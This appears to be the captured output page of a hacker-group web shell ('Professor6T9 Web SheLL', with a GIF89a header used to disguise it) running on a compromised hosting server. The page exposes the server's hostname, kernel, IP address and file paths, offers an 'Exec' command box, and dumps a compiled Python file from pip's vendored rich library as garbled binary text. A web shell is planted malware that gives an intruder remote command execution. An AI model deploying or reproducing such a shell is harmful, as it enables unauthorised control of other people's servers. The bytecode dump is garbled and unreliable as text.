GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
hc_python
/
lib
/
python3.12
/
site-packages
/
pip
/
_vendor
/
rich
/
__pycache__
[ HOME ]
Exec
Submit
File Name : pager.cpython-312.pyc
� �0i< � � � d dl mZmZ d dlmZ G d� de� Z G d� de� Zedk( rEdd lm Z dd l mZ e� Z e j d�� 5 e j e � � d d d � y y # 1 sw Y y xY w)� )�ABC�abstractmethod)�Anyc �* � e Zd ZdZededdfd�� Zy)�PagerzBase class for a pager.�content�returnNc � � y)zbShow content in pager. Args: content (str): Content to be displayed. N� ��selfr s �E/opt/hc_python/lib/python3.12/site-packages/pip/_vendor/rich/pager.py�showz Pager.show s � � )�__name__� __module__�__qualname__�__doc__r �strr r r r r r s% � �!���C� �D� � �r r c �0 � e Zd ZdZdedefd�Zdeddfd�Zy)�SystemPagerz'Uses the pager installed on the system.r r c �6 � t d� j |� S )N�pydoc)� __import__�pagerr s r �_pagerzSystemPager._pager s � ��'�"�(�(��1�1r Nc �&